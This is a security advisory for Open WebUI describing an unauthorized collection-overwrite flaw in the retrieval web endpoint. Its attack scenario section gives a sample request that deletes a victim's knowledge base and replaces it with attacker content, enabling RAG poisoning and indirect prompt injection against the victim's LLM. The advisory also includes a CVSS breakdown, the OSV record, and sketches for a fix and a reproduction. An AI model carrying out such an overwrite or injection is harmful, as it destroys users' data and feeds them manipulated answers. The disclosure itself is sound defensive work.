GHSA-7R82-QHG4-6WVJ

Vulnerability from github – Published: 2026-05-08 19:51 – Updated: 2026-05-08 19:51
Summary
Open WebUI has Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite
Details

Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite

Affected Component

Retrieval web/YouTube processing endpoints:

  • backend/open_webui/routers/retrieval.py (lines 1810-1837, process_web)
  • backend/open_webui/routers/retrieval.py (the parallel process_youtube endpoint)
  • backend/open_webui/routers/retrieval.py (line 1445, save_docs_to_vector_db call chain)

Affected Versions

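Current main branch at the time of the report (commit 6fdd19bf1) and likely all versions with RAG/knowledge base functionality. The advisory metadata lists versions up to and including 0.8.12 as affected, with the fix in 0.9.0.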

Description

The POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content.

Combined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user's knowledge base UUID and then destroy or poison it.

# retrieval.py:1810-1837 — no collection authorization check
@router.post('/process/web')
async def process_web(
    request: Request,
    form_data: ProcessUrlForm,
    user=Depends(get_verified_user),
    ...
):
    # ... fetch and process the URL ...
    save_docs_to_vector_db(
        request=request,
        docs=docs,
        collection_name=form_data.collection_name,  # attacker-controlled, unchecked
        overwrite=overwrite,                        # defaults to True
        ...
    )
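
One way to close the gap shown above is to resolve the requested collection to its owner before any write happens. The sketch below is a minimal illustration under stated assumptions, not the project's actual patch: `User`, `KB_OWNERS`, `CollectionAccessError`, and `authorize_collection_write` are hypothetical names, and a real deployment would look up ownership and write grants in its database rather than in a dictionary.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: str
    role: str = "user"


# Hypothetical ownership table: collection name (KB UUID) -> owner user id.
KB_OWNERS = {"kb-victim-uuid": "alice"}


class CollectionAccessError(PermissionError):
    """Raised when a user may not write to the requested collection."""


def authorize_collection_write(user: User, collection_name: str) -> None:
    """Allow the write only for admins, the owner, or an unclaimed name."""
    owner = KB_OWNERS.get(collection_name)
    if owner is None:
        # Assumption: names with no recorded owner are fresh ad hoc collections.
        return
    if user.role == "admin" or owner == user.id:
        return
    raise CollectionAccessError(f"{user.id} may not write to {collection_name}")
```

A handler would call `authorize_collection_write(user, form_data.collection_name)` before reaching the save step. Treating unclaimed names as writable is a simplification for this sketch; a stricter policy could reject any caller-supplied name that the caller did not create.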

CVSS 3.1 Breakdown

| Metric | Value | Rationale |
|--------|-------|-----------|
| Attack Vector | Network (N) | Exploited remotely via API call |
| Attack Complexity | Low (L) | Single API call with a known KB UUID |
| Privileges Required | Low (L) | Requires any authenticated user account |
| User Interaction | None (N) | No victim interaction required |
| Scope | Unchanged (U) | Impact within the knowledge base authorization boundary |
| Confidentiality | None (N) | No data disclosure from this vulnerability directly |
| Integrity | High (H) | Complete replacement of victim's KB content with attacker-controlled data |
| Availability | High (H) | Victim's original KB embeddings are deleted; KB effectively destroyed |
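
The metric values above correspond to the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H. As a worked check, the following sketch applies the CVSS v3.1 base score formula for the scope-unchanged case using the specification's published metric weights. The function and variable names are illustrative only.

```python
import math

# CVSS v3.1 metric weights for AV:N / AC:L / PR:L (scope unchanged) / UI:N
AV, AC, PR, UI = 0.85, 0.77, 0.62, 0.85
# Impact weights for C:N / I:H / A:H
C, I, A = 0.0, 0.56, 0.56


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged() -> float:
    """Base score formula for vectors with Scope: Unchanged."""
    iss = 1 - (1 - C) * (1 - I) * (1 - A)
    impact = 6.42 * iss
    exploitability = 8.22 * AV * AC * PR * UI
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score_scope_unchanged())  # 8.1
```

A score of 8.1 falls in the 7.0 to 8.9 band, which is consistent with the HIGH severity recorded for this advisory.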

Attack Scenario

  1. Attacker discovers victim's KB UUID via the knowledge-bases meta-collection (separate finding) or other enumeration.
  2. Attacker sends:

       POST /api/v1/retrieval/process/web?overwrite=true
       {
         "url": "https://attacker.com/poison",
         "collection_name": "<victim_kb_uuid>"
       }
  3. The endpoint fetches content from the attacker's URL.
  4. save_docs_to_vector_db deletes the entire vector collection belonging to the victim's knowledge base.
  5. The attacker's fetched content is embedded and written as the new collection content.
  6. Victim's RAG queries against their KB now return attacker-controlled content instead of their original documents.
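
The delete-then-write sequence in the steps above can be reproduced with a toy model. This is a sketch under stated assumptions: `InMemoryVectorStore` and `save_docs` are hypothetical stand-ins that store raw strings instead of embeddings, and they only mirror the behavior the advisory describes (delete the collection when overwrite is set, then insert).

```python
class InMemoryVectorStore:
    """Toy stand-in for a vector database; holds raw text, not embeddings."""

    def __init__(self) -> None:
        self.collections: dict[str, list[str]] = {}

    def delete_collection(self, name: str) -> None:
        self.collections.pop(name, None)

    def insert(self, name: str, docs: list[str]) -> None:
        self.collections.setdefault(name, []).extend(docs)


def save_docs(store: InMemoryVectorStore, collection_name: str,
              docs: list[str], overwrite: bool = True) -> None:
    """Delete the target collection first when overwrite is set, then write."""
    if overwrite:
        store.delete_collection(collection_name)
    store.insert(collection_name, docs)


store = InMemoryVectorStore()
victim_kb = "victim-kb-uuid"  # placeholder for the victim's KB UUID

# The victim's legitimate content is indexed first.
save_docs(store, victim_kb, ["internal policy v3", "pricing sheet"])

# The attacker's call names the same collection; nothing checks ownership.
save_docs(store, victim_kb, ["attacker-controlled text"], overwrite=True)

print(store.collections[victim_kb])  # ['attacker-controlled text']
```

After the second call, none of the victim's entries remain in the collection, which is why later retrieval returns only the attacker's text.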

Impact

  • Data destruction: Victim's original KB embeddings are permanently deleted from the vector store
  • RAG poisoning: Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim
  • Indirect prompt injection: Poisoned content can contain crafted prompts that manipulate the victim's LLM behavior when queried
  • Persistence: The poisoned content persists until the KB is rebuilt from source files

Preconditions

  • Attacker must have a valid user account
  • Attacker must know the target collection name (KB UUID) — easily obtained via the knowledge-bases enumeration finding

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.12"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44554"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T19:51:14Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite\n\n## Affected Component\n\nRetrieval web/YouTube processing endpoints:\n- `backend/open_webui/routers/retrieval.py` (lines 1810-1837, `process_web`)\n- `backend/open_webui/routers/retrieval.py` (the parallel `process_youtube` endpoint)\n- `backend/open_webui/routers/retrieval.py` (line 1445, `save_docs_to_vector_db` call chain)\n\n## Affected Versions\n\nCurrent main branch (commit `6fdd19bf1`) and likely all versions with RAG/knowledge base functionality.\n\n## Description\n\nThe `POST /api/v1/retrieval/process/web` endpoint accepts a user-supplied `collection_name` and an `overwrite` query parameter (default: `True`). It performs no authorization check on whether the calling user owns or has write access to the target collection. When `overwrite=True`, `save_docs_to_vector_db` calls `VECTOR_DB_CLIENT.delete_collection()` on the target collection before writing new content.\n\nCombined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user\u0027s knowledge base UUID and then destroy or poison it.\n\n```python\n# retrieval.py:1810-1837 \u2014 no collection authorization check\n@router.post(\u0027/process/web\u0027)\nasync def process_web(\n    request: Request,\n    form_data: ProcessUrlForm,\n    user=Depends(get_verified_user),\n    ...\n):\n    # ... 
fetch and process the URL ...\n    save_docs_to_vector_db(\n        request=request,\n        docs=docs,\n        collection_name=form_data.collection_name,  # attacker-controlled, unchecked\n        overwrite=overwrite,                        # defaults to True\n        ...\n    )\n```\n\n## CVSS 3.1 Breakdown\n\n| Metric | Value | Rationale |\n|--------|-------|-----------|\n| Attack Vector | Network (N) | Exploited remotely via API call |\n| Attack Complexity | Low (L) | Single API call with a known KB UUID |\n| Privileges Required | Low (L) | Requires any authenticated user account |\n| User Interaction | None (N) | No victim interaction required |\n| Scope | Unchanged (U) | Impact within the knowledge base authorization boundary |\n| Confidentiality | None (N) | No data disclosure from this vulnerability directly |\n| Integrity | High (H) | Complete replacement of victim\u0027s KB content with attacker-controlled data |\n| Availability | High (H) | Victim\u0027s original KB embeddings are deleted; KB effectively destroyed |\n\n## Attack Scenario\n\n1. Attacker discovers victim\u0027s KB UUID via the `knowledge-bases` meta-collection (separate finding) or other enumeration.\n2. Attacker sends:\n   ```\n   POST /api/v1/retrieval/process/web?overwrite=true\n   {\n     \"url\": \"https://attacker.com/poison\",\n     \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n   }\n   ```\n3. The endpoint fetches content from the attacker\u0027s URL.\n4. `save_docs_to_vector_db` deletes the entire vector collection belonging to the victim\u0027s knowledge base.\n5. The attacker\u0027s fetched content is embedded and written as the new collection content.\n6. 
Victim\u0027s RAG queries against their KB now return attacker-controlled content instead of their original documents.\n\n## Impact\n\n- **Data destruction:** Victim\u0027s original KB embeddings are permanently deleted from the vector store\n- **RAG poisoning:** Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim\n- **Indirect prompt injection:** Poisoned content can contain crafted prompts that manipulate the victim\u0027s LLM behavior when queried\n- **Persistence:** The poisoned content persists until the KB is rebuilt from source files\n\n## Preconditions\n\n- Attacker must have a valid user account\n- Attacker must know the target collection name (KB UUID) \u2014 easily obtained via the `knowledge-bases` enumeration finding",
  "id": "GHSA-7r82-qhg4-6wvj",
  "modified": "2026-05-08T19:51:14Z",
  "published": "2026-05-08T19:51:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-7r82-qhg4-6wvj"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite"
}
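
The "ranges" events in the record above can be used to check whether an installed release is affected. The following is a simplified sketch, not a full OSV range evaluator: it assumes plain dotted numeric versions, assumes events are listed in ascending order, and uses hypothetical helper names (`parse`, `is_affected`). The embedded record is a trimmed copy of the fields shown above.

```python
import json

# Trimmed copy of the "affected" ranges from the advisory record.
RECORD = json.loads("""
{"affected": [{"package": {"ecosystem": "PyPI", "name": "open-webui"},
  "ranges": [{"type": "ECOSYSTEM",
              "events": [{"introduced": "0"}, {"fixed": "0.9.0"}]}]}]}
""")


def parse(version: str) -> tuple[int, ...]:
    """Parse a plain dotted release such as '0.8.12' (no pre/post releases)."""
    return tuple(int(part) for part in version.split("."))


def is_affected(installed: str, record: dict = RECORD) -> bool:
    """Walk each range's events in order and track the vulnerable state."""
    current = parse(installed)
    for affected in record["affected"]:
        for rng in affected["ranges"]:
            vulnerable = False
            for event in rng["events"]:
                if "introduced" in event and current >= parse(event["introduced"]):
                    vulnerable = True
                if "fixed" in event and current >= parse(event["fixed"]):
                    vulnerable = False
            if vulnerable:
                return True
    return False


print(is_affected("0.8.12"))  # True
print(is_affected("0.9.0"))   # False
```

For real inventories, a dedicated version library that understands PyPI version syntax would be a safer choice than the tuple comparison used here.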

